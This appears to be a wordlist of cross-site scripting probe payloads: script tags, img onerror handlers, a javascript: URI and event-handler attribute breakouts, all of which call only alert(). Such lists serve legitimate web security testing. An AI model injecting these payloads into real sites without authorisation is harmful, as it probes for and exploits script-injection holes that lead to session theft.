alert()
alert;throw 1
javascript:alert()

<script>alert()</script>
<script>alert;throw 1</script>
<img src=1 onerror=alert()>

"><script>alert()</script>"
"><script>alert;throw 1</script>"
"><img src=1 onerror=alert()>"

'><script>alert()</script>'
'><script>alert;throw 1</script>'
'><img src=1 onerror=alert()>'

 onload=alert()
 onerror=alert()
 autofocusonfocus=alert()

"onload="alert()
"onerror="alert()
"autofocus onfocus="alert()

'onload='alert()
'onerror='alert()
'autofocus onfocus='alert()
